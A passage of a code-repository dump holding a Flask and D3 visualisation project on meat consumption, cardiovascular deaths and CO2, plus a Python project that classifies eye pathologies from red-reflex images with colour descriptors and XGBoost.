axis=1)\n#print(final_col)\nconstraint_matrix = np.concatenate((constraint_matrix, np.array([final_col]).T), axis=1)\n\ndef findPivot():\n pvCol = -1\n for i in range(len(constraint_matrix[0])-1):\n if constraint_matrix[0][i] > 0:\n pvCol = i\n break\n if pvCol == -1:\n return -1, -1\n tmpMin = constraint_matrix[1][-1]/constraint_matrix[1][pvCol]\n pvRow = 1\n for i in range(1, len(constraint_matrix)):\n ratio = constraint_matrix[i][-1]/constraint_matrix[i][pvCol]\n if ratio < tmpMin:\n pvRow = i\n tmpMin = ratio\n return pvRow, pvCol\n\ndef performPivot(row, col):\n print(\"Pivoting on %d, %d\"%(row, col))\n #let c be a row resulting from solving for M[r][c]\n c = constraint_matrix[row]\n constraint_matrix[row] *= 1/c[col]\n c = (1/c[col])*c\n c *= [-1 for _ in range(1, len(c))] + [1]\n c[col] = -1\n print(c)\n for i, _ in enumerate(constraint_matrix):\n if i == row:\n continue\n constraint_matrix[i] += constraint_matrix[i][col]*c\n\nprint(constraint_matrix)\nr, c = findPivot()\nwhile r != -1 and c != -1:\n performPivot(r, c)\n r, c = findPivot()\n print(constraint_matrix)\n" } ]
1
cloe5541/project-2
https://github.com/cloe5541/project-2
be11a562eb2f641de1e87d4725ca06356b98c74f
f9b2bef1a940cba5ada2f6a14f12d6e92a061530
16b1f822c6419f0c099a9c76891c03ffc48227e9
refs/heads/master
2022-04-23T07:11:47.610232
2020-04-26T23:32:23
2020-04-26T23:32:23
259,155,063
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6543535590171814, "alphanum_fraction": 0.6569920778274536, "avg_line_length": 17.950000762939453, "blob_id": "9d53e137c2fb94494bebf70028808502333a29c3", "content_id": "5fc7d328fbf8d0037b0866bea82e7f009ce8ec55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 379, "license_type": "no_license", "max_line_length": 116, "num_lines": 20, "path": "/project-2-master/project-2-master/app.py", "repo_name": "cloe5541/project-2", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nimport csv\nimport pandas as pd\n\n\napp = Flask(__name__)\n\[email protected](\"/\")\ndef index():\n return render_template('index.html', bar_csv='static/cardio_top_yrs.csv', scatter_csv='static/meat_vs_co2.csv');\n\n\n\n\[email protected]('/meat_world')\ndef meat_world():\n return render_template('meat_world.html')\n\nif __name__ == \"__main__\":\n app.run()\n" }, { "alpha_fraction": 0.5023148059844971, "alphanum_fraction": 0.5188746452331543, "avg_line_length": 23.959999084472656, "blob_id": "975ba3eb403288b61b6af33149fbd4a51e7121ef", "content_id": "3e02efea6432fe208717a014fa1ae94432c6fadd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5616, "license_type": "no_license", "max_line_length": 142, "num_lines": 225, "path": "/project-2-master/project-2-master/static/scatter_interactive.js", "repo_name": "cloe5541/project-2", "src_encoding": "UTF-8", "text": "// Bar chart 1\n\nvar width_s = document.getElementById('scatterPlot')\n .clientWidth;\nvar height_s = document.getElementById('scatterPlot')\n .clientHeight;\n\nvar margin = {\n top: 10,\n bottom: 70,\n left: 70,\n right: 20\n}\n\nvar svg_s = d3.select('#scatterPlot')\n .append('svg')\n .attr('width', width_s)\n .attr('height', height_s + 50)\n .append('g')\n .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')');\n\nwidth_s = width_s - margin.left - margin.right;\nheight_s = height_s - margin.top - margin.bottom;\n\nvar data = {};\n\nvar x_scale_s = d3.scaleLinear()\n .range([0, width_s]);\n\nvar y_scale_s = d3.scaleLinear()\n .range([height_s, 0]);\n\nvar color_scale_s = d3.scaleLinear()\n .range(['lightgreen', 'darkgreen']);\n // .range(['#c0fa87', '#0a7d2c']);\n\nvar y_axis_s = d3.axisLeft(y_scale_s);\nvar x_axis_s = d3.axisBottom(x_scale_s);\n\nsvg_s.append('g')\n .attr('class', 'x axis_s')\n .attr('transform', 'translate(0,' + height_s + ')');\n\nsvg_s.append('g')\n .attr('class', 'y axis_s');\n\n\n// X axis label\n\nvar labelArea = 110;\nvar tPadBot = 40;\nvar labelMargin = 100;\n\nsvg_s.append(\"g\").attr(\"class\", \"xText_s\");\n\n// xText will allows ut to select the group without excess code\nvar xText_s = d3.select(\".xText_s\");\n\nfunction xTextRefresh_s(){\n xText_s.attr(\n \"transform\",\n \"translate(\" +\n (width_s / 2 - labelArea) +\n \", \" +\n (height_s + tPadBot) +\n \")\"\n )\n}\n\nxTextRefresh_s()\n\nxText_s\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Meat production (million tonnes)\")\n\n// End x axis label\n\n\n// Y axis label\n\nvar labelArea = 100;\nvar leftTextX = -(margin.left * 0.8);\nvar leftTextY = height_s / 2 + labelArea;\n\nsvg_s.append(\"g\").attr(\"class\", \"yText_s\");\n\nvar yText_s = d3.select(\".yText_s\");\n\nfunction yTextRefresh_s(){\n yText_s.attr(\n \"transform\",\n `translate(${leftTextX}, ${leftTextY}) rotate(-90)`\n )\n}\n\nyTextRefresh_s();\n\nyText_s\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"CO2 Emissions (million tonnes)\")\n\n// End Y axis label\n\nall_csv_data_s = {}\n\nfunction draw_scatter(year) {\n\n var t = d3.transition()\n .duration(2000);\n\n csv_data = all_csv_data_s.filter(function(d) {\n return d.Year == year;\n });\n\n var max_x_value = d3.max(csv_data, function(d) {\n return +d.meat_production;\n });\n x_scale_s.domain([0, max_x_value]);\n\n var max_y_value = d3.max(csv_data, function(d) {\n return +d.Co2;\n });\n y_scale_s.domain([0, max_y_value]);\n color_scale_s.domain([0, max_y_value]);\n\n // Tooltips\n\n var toolTip = d3\n .tip()\n .attr(\"class\", \"d3-tip\")\n .html (function(d){\n var meat_prod = parseFloat(d.meat_production).toFixed(2);\n var co2 = parseFloat(d.Co2).toFixed(2);\n var theState = `<div>${d.Country}</div>`;\n var theY = `<div>CO2: ${co2}MT</div>`;\n var theX = `<div>Meat: ${meat_prod}MT</div>`;\n return theState + theX + theY;\n });\n\n svg_s.call(toolTip);\n\n\n var circles = svg_s.selectAll('circle')\n .data(csv_data)\n\n circles\n .exit()\n .remove();\n\n // Create Circles\n svg_s.selectAll(\"circle\")\n .data(csv_data)\n .enter()\n .append(\"circle\") // Add circle svg\n .attr(\"cx\", function(d) {\n return x_scale_s(d.meat_production); // Circle's X\n })\n .attr(\"cy\", function(d) { // Circle's Y\n return y_scale_s(d.Co2);\n })\n .attr('fill', function(d) {\n return color_scale_s(d.Co2);\n })\n .attr(\"r\", 5) // radius\n .on(\"mouseover\",function(d){\n toolTip.show(d,this);\n })\n .on(\"mouseout\", function(d){\n toolTip.hide(d)\n });\n\n // Update circles\n // svg_s.selectAll(\"circle\")\n // .data(csv_data) // Update with new data\n // .transition() // Transition from old to new\n // .duration(2000) // Length of animation\n // .each(\"start\", function() { // Start animation\n // d3.select(this) // 'this' means the current element\n // .attr(\"fill\", \"red\") // Change color\n // .attr(\"r\", 5); // Change size\n // })\n // // .delay(function(d, i) {\n // // return i / dataset.length * 500; // Dynamic delay (i.e. each item delays a little longer)\n // // })\n // //.ease(\"linear\") // Transition easing - default 'variable' (i.e. has acceleration), also: 'circle', 'elastic', 'bounce', 'linear'\n // .attr(\"cx\", function(d) {\n // return x_scale_s(d.meat_production); // Circle's X\n // })\n // .attr(\"cy\", function(d) {\n // return y_scale_s(d.Co2); // Circle's Y\n // })\n // .each(\"end\", function() { // End animation\n // d3.select(this) // 'this' means the current element\n // .transition()\n // .duration(500)\n // .attr(\"fill\", \"black\") // Change color\n // .attr(\"r\", 2); // Change radius\n // });\n\n svg_s.select('.x.axis_s')\n .transition(t)\n .call(x_axis_s);\n\n svg_s.select('.y.axis_s')\n .transition(t)\n .call(y_axis_s);\n\n}\n\n// ==========================================================================\n// Common code\n\nd3.csv('/static/meat_vs_co2.csv').then(function(data){\n all_csv_data_s = data;\n draw_scatter('2017');\n})\n\nvar slider = d3.select('#year');\nslider.on('change', function() {\n draw(this.value);\n draw_2(this.value);\n draw_scatter(this.value);\n});\n" }, { "alpha_fraction": 0.48946359753608704, "alphanum_fraction": 0.5202347040176392, "avg_line_length": 20.306121826171875, "blob_id": "5208704e3f551e8246043f4c2b3ea43539970ec6", "content_id": "d362ea27501e5f8713300ea9a6366704d68eba1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8352, "license_type": "no_license", "max_line_length": 112, "num_lines": 392, "path": "/project-2-master/project-2-master/static/bar_interactive.js", "repo_name": "cloe5541/project-2", "src_encoding": "UTF-8", "text": "// Bar chart 1\n\nvar width = document.getElementById('barChart')\n .clientWidth;\nvar height = document.getElementById('barChart')\n .clientHeight;\n\nvar margin = {\n top: 10,\n bottom: 70,\n left: 70,\n right: 20\n}\n\nvar svg = d3.select('#barChart')\n .append('svg')\n .attr('width', width)\n .attr('height', height + 50)\n .append('g')\n .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')');\n\nwidth = width - margin.left - margin.right;\nheight = height - margin.top - margin.bottom;\n\nvar data = {};\n\nvar x_scale = d3.scaleBand()\n .rangeRound([0, width])\n .padding(0.1);\n\nvar y_scale = d3.scaleLinear()\n .range([height, 0]);\n\nvar colour_scale = d3.scaleQuantile()\n .range([\"#ffffe5\", \"#fff7bc\", \"#fee391\", \"#fec44f\", \"#fe9929\", \"#ec7014\", \"#cc4c02\", \"#993404\", \"#662506\"]);\n\nvar y_axis = d3.axisLeft(y_scale);\nvar x_axis = d3.axisBottom(x_scale);\n\nsvg.append('g')\n .attr('class', 'x axis')\n .attr('transform', 'translate(0,' + height + ')');\n\nsvg.append('g')\n .attr('class', 'y axis');\n\n\n// X axis label\n\nvar labelArea = 110;\nvar tPadBot = 40;\nvar labelMargin = 100;\n\nsvg.append(\"g\").attr(\"class\", \"xText\");\n\n// xText will allows ut to select the group without excess code\nvar xText = d3.select(\".xText\");\n\nfunction xTextRefresh(){\n xText.attr(\n \"transform\",\n \"translate(\" +\n (width / 2) +\n \", \" +\n // (height - labelMargin - tPadBot) +\n (height + labelMargin) +\n \")\"\n )\n}\n\nxTextRefresh()\n\nxText\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Countries\")\n\n// End x axis label\n\n\n// Y axis label\n\nvar labelArea = 100;\nvar leftTextX = -(margin.left / 2);\nvar leftTextY = height / 2 + labelArea * 1.5;\n\nsvg.append(\"g\").attr(\"class\", \"yText\");\n\nvar yText = d3.select(\".yText\");\n\nfunction yTextRefresh(){\n yText.attr(\n \"transform\",\n `translate(${leftTextX}, ${leftTextY}) rotate(-90)`\n )\n}\n\nyTextRefresh();\n\nyText\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Meat Consumption Per Person (in Kg)\")\n\n// End Y axis label\n\nall_csv_data = {}\n\nfunction draw(year) {\n\n var t = d3.transition()\n .duration(2000);\n\n csv_data = all_csv_data.filter(function(d) {\n return d.Year == year;\n });\n\n var countries = csv_data.map(function(d) {\n return d.Entity;\n });\n x_scale = x_scale.domain(countries);\n\n var max_value = d3.max(csv_data, function(d) {\n return +d.Meat;\n });\n\n y_scale.domain([0, max_value]);\n colour_scale.domain([0, max_value]);\n\n var tip = d3.tip()\n .attr('class', 'd3-tip')\n .offset([-5, 0])\n .html(function(d) {\n var theState = `<div>${d.Entity}</div>`;\n var theY = `<div>Meat: ${d.Meat}Kg</div>`;\n return theState + theY;\n });\n svg.call(tip);\n\n var bars = svg.selectAll('.bar')\n .data(csv_data)\n\n bars\n .exit()\n .remove();\n\n var new_bars = bars\n .enter()\n .append('rect')\n .attr('class', 'bar')\n .attr('x', function(d) {\n return x_scale(d.Entity);\n })\n .attr('width', x_scale.bandwidth())\n .attr('y', height)\n .attr('height', 0)\n .on(\"mouseover\",function(d){\n tip.show(d,this);\n })\n .on(\"mouseout\", function(d){\n tip.hide(d)\n });\n\n new_bars.merge(bars)\n .transition(t)\n .attr('y', function(d) {\n return y_scale(+d.Meat);\n })\n .attr('height', function(d) {\n return height - y_scale(+d.Meat)\n })\n .attr('fill', function(d) {\n return colour_scale(+d.Meat);\n })\n\n svg.select('.x.axis')\n .call(x_axis)\n .selectAll(\"text\")\n .attr(\"y\", 15)\n .attr(\"x\", 0)\n .attr(\"dy\", \".35em\")\n .attr(\"transform\", \"rotate(45)\")\n .style(\"text-anchor\", \"start\");;\n\n svg.select('.y.axis')\n .transition(t)\n .call(y_axis);\n\n}\n\n// ==========================================================================\n// Bar chart 2\n\n\nvar width = document.getElementById('barChart2')\n .clientWidth;\nvar height = document.getElementById('barChart2')\n .clientHeight;\n\nvar margin = {\n top: 10,\n bottom: 70,\n left: 70,\n right: 20\n}\n\nvar svg2 = d3.select('#barChart2')\n .append('svg')\n .attr('width', width)\n .attr('height', height + 50)\n .append('g')\n .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')');\n\nwidth = width - margin.left - margin.right;\nheight = height - margin.top - margin.bottom;\n\nvar data = {};\n\nvar x_scale2 = d3.scaleBand()\n .rangeRound([0, width])\n .padding(0.1);\n\nvar y_scale2 = d3.scaleLinear()\n .range([height, 0]);\n\nvar colour_scale2 = d3.scaleQuantile()\n .range([\"#d2e2fa\", \"#afc7ed\", \"#96b8f2\", \"#749adb\", \"#537cc2\", \"#385fa1\", \"#183c78\", \"#0b2857\", \"#001942\"]);\n\nvar y_axis2 = d3.axisLeft(y_scale2);\nvar x_axis2 = d3.axisBottom(x_scale2);\n\nsvg2.append('g')\n .attr('class', 'x axis2')\n .attr('transform', 'translate(0,' + height + ')');\n\nsvg2.append('g')\n .attr('class', 'y axis2');\n\n\n// X axis label\n\nvar labelArea = 110;\nvar tPadBot = 40;\nvar labelMargin = 100;\n\nsvg2.append(\"g\").attr(\"class\", \"xText2\");\n\n// xText will allows ut to select the group without excess code\nvar xText2 = d3.select(\".xText2\");\n\nfunction xText2Refresh(){\n xText2.attr(\n \"transform\",\n \"translate(\" +\n (width / 2) +\n \", \" +\n // (height - labelMargin - tPadBot) +\n (height + labelMargin) +\n \")\"\n )\n}\n\nxText2Refresh()\n\nxText2\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Countries\")\n\n// End x axis label\n\n\n// Y axis label\n\nvar labelArea = 100;\nvar leftTextX = -(margin.left / 2);\nvar leftTextY = height / 2 + labelArea * 1.5;\n\nsvg2.append(\"g\").attr(\"class\", \"yText2\");\n\nvar yText2 = d3.select(\".yText2\");\n\nfunction yText2Refresh(){\n yText2.attr(\n \"transform\",\n `translate(${leftTextX}, ${leftTextY}) rotate(-90)`\n )\n}\n\nyText2Refresh();\n\nyText2\n .append(\"text\")\n .attr(\"y\", 0)\n .text(\"Cardiovascular Deaths (per 100,000 people)\")\n\n// End Y axis label\n\nall_csv_data = {}\n\nfunction draw_2(year) {\n\n var t = d3.transition()\n .duration(2000);\n\n csv_data = all_csv_data.filter(function(d) {\n return d.Year == year;\n });\n\n var countries = csv_data.map(function(d) {\n return d.Entity;\n });\n x_scale2 = x_scale2.domain(countries);\n\n var max_value = d3.max(csv_data, function(d) {\n return +d.Deaths;\n });\n\n y_scale2.domain([0, max_value]);\n colour_scale2.domain([0, max_value]);\n\n var tip = d3.tip()\n .attr('class', 'd3-tip')\n .offset([-5, 0])\n .html(function(d) {\n var deaths = parseFloat(d.Deaths).toFixed(2);\n var theState = `<div>${d.Entity}</div>`;\n var theY = `<div>Deaths: ${deaths} people</div>`;\n return theState + theY;\n });\n svg.call(tip);\n\n var bars = svg2.selectAll('.bar')\n .data(csv_data)\n\n bars\n .exit()\n .remove();\n\n var new_bars = bars\n .enter()\n .append('rect')\n .attr('class', 'bar')\n .attr('x', function(d) {\n return x_scale2(d.Entity);\n })\n .attr('width', x_scale2.bandwidth())\n .attr('y', height)\n .attr('height', 0)\n .on(\"mouseover\",function(d){\n tip.show(d,this);\n })\n .on(\"mouseout\", function(d){\n tip.hide(d)\n });;\n\n new_bars.merge(bars)\n .transition(t)\n .attr('y', function(d) {\n return y_scale2(+d.Deaths);\n })\n .attr('height', function(d) {\n return height - y_scale2(+d.Deaths)\n })\n .attr('fill', function(d) {\n return colour_scale2(+d.Deaths);\n })\n\n svg2.select('.x.axis2')\n .call(x_axis2)\n .selectAll(\"text\")\n .attr(\"y\", 15)\n .attr(\"x\", 0)\n .attr(\"dy\", \".35em\")\n .attr(\"transform\", \"rotate(45)\")\n .style(\"text-anchor\", \"start\");;\n\n svg2.select('.y.axis2')\n .transition(t)\n .call(y_axis2);\n\n}\n\n\n// ==========================================================================\n// Common code\n\nd3.csv('/static/cardio_top_yrs.csv').then(function(data){\n all_csv_data = data;\n draw('2017');\n draw_2('2017');\n})\n" } ]
3
cmanfeed/Scientific-Research
https://github.com/cmanfeed/Scientific-Research
8ffb688ee0c005e1ab046cda6ecc42e8bfcee575
6e644daeb637732800a0c96c3981c2008ed18580
76c41ecddc8b8daaa383fbf537f478ac1ebaaf73
refs/heads/main
2023-04-23T05:05:17.746455
2021-05-03T22:42:19
2021-05-03T22:42:19
362,592,198
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5481147766113281, "alphanum_fraction": 0.556555986404419, "avg_line_length": 29.457143783569336, "blob_id": "e77cafe138542312bc7cb8c71359acf85bbef3c9", "content_id": "6b05db447a70aadcebd53dd968cdc9ae311ac0ff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5331, "license_type": "permissive", "max_line_length": 115, "num_lines": 175, "path": "/Detecção de Patologias Oculares em Imagens Reflexo Vermelho Utilizando Descritores de Cor/main.py", "repo_name": "cmanfeed/Scientific-Research", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nimport cv2\nimport sklearn.metrics import confusion_matrix\nfrom extract_features import *\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\nfrom xgboost import XGBClassifier\n\ndef load_pacients(n_path, p_path):\n normal = []\n problm = []\n\n for file in os.listdir(n_path):\n eyes = [cv2.imread(n_path + '/' + file + '/' + eye) for eye in os.listdir(n_path + '/' + file)]\n normal.append(eyes)\n \n for file in os.listdir(p_path):\n eyes = [cv2.imread(p_path + '/' + file + '/' + eye) for eye in os.listdir(p_path + '/' + file)]\n problm.append(eyes)\n \n return normal, problm\n\n\ndef load_masks(normal, nm_path, problm, pm_path):\n normal_m = []\n problm_m = []\n\n for patient, maskfile in zip(normal, os.listdir(nm_path)):\n eyes = []\n for pac_eye, mask_eye in zip(patient, os.listdir(nm_path + '/' + maskfile)):\n mask = cv2.imread(nm_path + '/' + maskfile + '/' + mask_eye, 0)\n eyem = cv2.bitwise_and(pac_eye, pac_eye, mask=mask)\n eyes.append(eyem)\n\n normal_m.append(eyes)\n \n for patient, maskfile in zip(problm, os.listdir(pm_path)):\n eyes = []\n for pac_eye, mask_eye in zip(patient, os.listdir(pm_path + '/' + maskfile)):\n mask = cv2.imread(pm_path + '/' + maskfile + '/' + mask_eye, 0)\n eyem = cv2.bitwise_and(pac_eye, pac_eye, mask=mask)\n eyes.append(eyem)\n\n problm_m.append(eyes)\n\n return normal_m, problm_m\n\n\ndef filter_transform(normal, problm, filt, spec):\n normal_pre = []\n problm_pre = []\n \n for patient in normal:\n eyes = [filt.apply(eye) for eye in patient]\n eyes = [spec.apply(eye) for eye in eyes]\n\n normal_pre.append(eyes)\n \n for patient in problm:\n eyes = [filt.apply(eye) for eye in patient]\n eyes = [spec.apply(eye) for eye in eyes]\n\n problm_pre.append(eyes)\n\n return normal_pre, problm_pre\n\ndef get_features(normal, problm, desc):\n X = []\n\n for patient in normal:\n feats = [desc.apply(eye) for eye in patient]\n X.append(feats)\n \n for patient in problm:\n feats = [desc.apply(eye) for eye in patient]\n X.append(feats)\n\n X = np.array(X)\n y = np.concatenate((np.zeros(len(normal), dtype=int),\n np.ones(len(problm), dtype=int)))\n \n return X, y\n\ndef unstack_features(X, y):\n X_unstk = []\n y_unstk = []\n\n for x_elm, y_elm in zip(X, y):\n for x_elm_sub in x_elm:\n X_unstk.append(x_elm_sub)\n y_unstk.append(y_elm)\n\n return np.array(X_unstk), np.array(y_unstk)\n\ndef distance_calc(x_test, y_pred, x_rgbfeats, test):\n y_pred_final = []\n\n for i, j in zip(range(0, len(y_pred), 2), range(6)):\n if y_pred[i] == 0 and y_pred[i+1] == 0:\n dist = np.linalg.norm(x_rgbfeats[test[j]][0] - x_rgbfeats[test[j]][1])\n if dist > 700:\n y_pred_final.append(1)\n else:\n y_pred_final.append(0)\n else:\n y_pred_final.append(1)\n \n return y_pred_final\n\n\nif __name__ == '__main__':\n\n filt = PreProcess('clahe')\n spec = TransformSpectrum('lab')\n desc = ColorDescriptor('imoments')\n\n # Getting best features with best params\n normal, problm = load_pacients('./data pacients/olhos/normal',\n './data pacients/olhos/problema')\n\n normal, problm = filter_transform(normal, problm, filt, spec)\n\n normal, problm = load_masks(normal, './data pacients/marcacoes/normal',\n problm, './data pacients/marcacoes/problema')\n\n X, y = get_features(normal, problm, desc)\n\n # Getting RGB features\n normal, problm = load_pacients('./data pacients/olhos/normal',\n './data pacients/olhos/problema')\n \n normal, problm = load_masks(normal, './data pacients/marcacoes/normal',\n problm, './data pacients/marcacoes/problema')\n\n X_rgb, _ = get_features(normal, problm, desc)\n\n # Validation metrics\n pre, sen, esp, acc = ([] for i in range(4))\n\n # Generating Cross Validation (K = 10)\n cv = KFold(n_splits=10, random_state=40, shuffle=True)\n\n for train, test in cv.split(X, y):\n x_tran, y_tran = unstack_eyes(X[train], y[train])\n x_test, y_test = unstack_eyes(X[test], y[test])\n\n model = XGBClassifier(objective='binary:logistic',verbosity=0, use_label_encoder=False).fit(x_tran, y_tran)\n \n y_pred = model.predict(x_test)\n y_pred_final = distance_calc(x_test, y_pred, X_rgb, test)\n\n cf = np.array([[0, 0], [0, 0]])\n if all(y[test] == y_pred_final):\n cf[0][0] += sum(y_pred == 0)\n cf[1][1] += sum(y_pred == 1)\n else:\n cf += confusion_matrix(y[test], y_pred_final)\n\n tn, fp, fn, tp = cf.ravel()\n\n if tp + fp > 0:\n pre.append(tp / (tp + fp))\n else:\n pre.append(0)\n if tp + fn > 0:\n sen.append(tp / (tp + fn))\n else:\n sen.append(0)\n\n esp.append(tn / (tn + fp))\n acc.append((tp + tn) / (tp + tn + fp + fn))\n\n print(np.mean(pre), np.mean(sen), np.mean(esp), np.mean(acc))\n\n" }, { "alpha_fraction": 0.5368649363517761, "alphanum_fraction": 0.5472428798675537, "avg_line_length": 26.83189582824707, "blob_id": "b8101a1fc6d8b241ce0034f889730b7cdbfc3428", "content_id": "86369a415fdda2b860a9d1c891bc97801b6c4405", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6456, "license_type": "permissive", "max_line_length": 90, "num_lines": 232, "path": "/Detecção de Patologias Oculares em Imagens Reflexo Vermelho Utilizando Descritores de Cor/extract_features.py", "repo_name": "cmanfeed/Scientific-Research", "src_encoding": "UTF-8", "text": "import glob\nimport cv2\nimport numpy as np\n\nfrom sklearn.cluster import KMeans\nfrom scipy.stats import skew, kurtosis\n\nfrom hyperopt import hp\nfrom xgboost import XGBClassifier\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn import metrics\nimport statistics\n\nclass PreProcess():\n\n def __init__(self, method):\n self.method = method\n\n def _hist_eqlize(self, img):\n return cv2.merge(([cv2.equalizeHist(ch)\n for ch in cv2.split(img)]))\n\n def _cont_clahe(self, img):\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n\n lab = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)\n lab[..., 0] = clahe.apply(lab[..., 0])\n\n return cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)\n\n def _oppt_colors(self, img):\n return 255 - img\n\n def apply(self, img):\n\n if self.method == 'eqlze':\n return self._hist_eqlize(img)\n \n elif self.method == 'clahe':\n return self._cont_clahe(img)\n \n elif self.method == 'oppcl':\n return self._oppt_colors(img)\n \n elif self.method == 'nopre':\n return img\n\n\nclass TransformSpectrum():\n\n def __init__(self, method):\n self.method = method\n\n def apply(self, img):\n\n if self.method == 'hsv':\n return cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n \n elif self.method == 'lab':\n return cv2.cvtColor(img, cv2.COLOR_BGR2Lab)\n \n elif self.method == 'bgr':\n return img\n\n\nclass ApplyMask():\n\n def __init__(self, method):\n self.method = method\n\n def _app_mask(self, imgs_n, imgs_p):\n\n masks_n = [cv2.imread(file, 0)\n for file in glob.iglob('./data/marcacoes/normal/*.jpg')]\n masks_p = [cv2.imread(file, 0)\n for file in glob.iglob('./data/marcacoes/problema/*.jpg')]\n\n n_with_mask = [cv2.bitwise_and(img, img, mask=mask)\n for img, mask in zip(imgs_n, masks_n)]\n p_with_mask = [cv2.bitwise_and(img, img, mask=mask)\n for img, mask in zip(imgs_p, masks_p)]\n\n return n_with_mask, p_with_mask\n\n def apply(self, imgs_n, imgs_p):\n\n if self.method == 'appmask':\n return self._app_mask(imgs_n, imgs_p)\n\n return imgs_n, imgs_p\n\n\nclass ColorDescriptor():\n\n def __init__(self, method):\n self.method = method\n\n def _clr_histgram(self, img):\n hist = [cv2.calcHist([ch], [0], None, [256], [0, 256])\n for ch in cv2.split(img)]\n flat = [elm for h in hist for elm in h]\n\n return np.concatenate(np.array(flat), axis=0)\n\n def _clr_dominant(self, img):\n img = img.reshape((img.shape[0] * img.shape[1], 3))\n clt = KMeans(n_clusters=3)\n clt.fit(img)\n\n numLabels = np.arange(0, len(np.unique(clt.labels_)) + 1)\n (hist, _) = np.histogram(clt.labels_, bins=numLabels)\n\n hist = hist.astype(\"float\")\n hist /= hist.sum()\n centers = np.concatenate(clt.cluster_centers_, axis=0)\n\n return np.concatenate((centers, hist), axis=0)\n\n def _clr_imoment(self, img):\n\n means = [np.mean(ch) for ch in cv2.split(img)]\n varis = [np.var(ch) for ch in cv2.split(img)]\n skews = [skew(ch.reshape(-1)) for ch in cv2.split(img)]\n kurts = [kurtosis(ch.reshape(-1)) for ch in cv2.split(img)]\n\n moments = means + varis + skews + kurts\n return np.array(moments)\n\n def _clr_all(self, img):\n return np.concatenate((self._clr_histgram(img),\n self._clr_dominant(img),\n self._clr_imoment(img)), axis=None)\n \n def _clr_imoment_dominant(self, img):\n return np.concatenate((self._clr_dominant(img),\n self._clr_imoment(img)), axis=None)\n \n\n def apply(self, img):\n\n if self.method == 'histogrm':\n return self._clr_histgram(img)\n\n elif self.method == 'dominant':\n return self._clr_dominant(img)\n\n elif self.method == 'imoments':\n return self._clr_imoment(img)\n \n elif self.method == 'alldescp':\n return self._clr_all(img)\n \n elif self.method == 'imondomt':\n return self._clr_imoment_dominant(img)\n\n\nclass Classifier():\n\n def __init__(self, name):\n self.name = name\n \n def _create_XGB(self):\n clf = XGBClassifier(objective='binary:logistic',\n verbosity=0, use_label_encoder=False)\n return clf\n \n def _create_ridge(self):\n clf = RidgeClassifier()\n return clf\n\n def _create_linearDA(self):\n clf = LinearDiscriminantAnalysis()\n return clf\n \n def _create_SVM(self):\n clf = SVC(kernel='rbf')\n return clf\n\n def _create_RandomForest(self):\n clf = RandomForestClassifier()\n return clf\n\n\n def get_scores(self, X, y):\n clf = self.apply()\n cv = KFold(n_splits=10, random_state=42, shuffle=True)\n \n acc, sen, esp = ([] for i in range(3))\n\n for (train, test) in cv.split(X, y):\n model = clf.fit(X[train], y[train])\n predict_test_class = model.predict(X[test])\n\n tn, fp, fn, tp = metrics.confusion_matrix(y[test], predict_test_class).ravel()\n \n if tp + fp > 0:\n pre.append(tp / (tp + fp))\n else:\n pre.append(0)\n \n if tp + fn > 0:\n sen.append(tp / (tp + fn))\n else:\n sen.append(0)\n\n esp.append(tn / (tn + fp))\n acc.append((tp + tn) / (tp + tn + fp + fn))\n\n return np.mean(acc), np.mean(sen), np.mean(esp)\n \n def apply(self):\n\n if self.name == 'xgboost':\n return self._create_XGB()\n \n elif self.name == 'ridgecl':\n return self._create_ridge()\n \n elif self.name == 'linarDA':\n return self._create_linearDA()\n\n elif self.name == 'svm':\n return self._create_SVM()\n\n elif self.name == 'randomforest':\n return self._create_RandomForest()" }, { "alpha_fraction": 0.8613861203193665, "alphanum_fraction": 0.8613861203193665, "avg_line_length": 49.5, "blob_id": "32cf34443a53939924662ec6d6e4075a06c9b901", "content_id": "32b571a55ec33427be33c5377c1ecc13438cd6e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 103, "license_type": "permissive", "max_line_length": 78, "num_lines": 2, "path": "/README.md", "repo_name": "cmanfeed/Scientific-Research", "src_encoding": "UTF-8", "text": "# Scientific-Research\nProjetos de pesquisa científica realizados na Universidade Federal do Maranhão\n" } ]
3
simoncos/weibo-complaint-crawler
https://github.com/simoncos/weibo-complaint-crawler
19528d442b112a5af63d719ee19ac4eb40cec253
93d30896581bbfea1ebc8672600c13b5646cc721
f15bcaa00427496da1538e6964049b1598b1b779
refs/heads/master
2023-03-30T11:06:26.640453
2023-03-26T03:22:05
2023-03-26T03:22:05
148,573,117
12
2
null
null
null
null
null
